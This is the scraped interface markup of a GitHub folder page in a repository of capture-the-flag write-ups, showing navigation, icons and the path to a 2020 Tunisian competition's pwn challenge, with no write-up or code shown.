<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> KEERRO </span> <span>/</span> ctf-writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>4</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>27</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>2</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>1</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/KEERRO/ctf-writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":162845937,"originating_url":"https://github.com/KEERRO/ctf-writeups/tree/master/Hack%20Zone%20Tunisia%202020/pwn/pwn2","user_id":null}}" data-hydro-click-hmac="b4e25b642492d7624326169a22cdcb094bde6e06643e82dbedcb0e808914df6e"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Hack Zone Tunisia 2020</span></span><span>/</span><span><span>pwn</span></span><span>/</span>pwn2<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
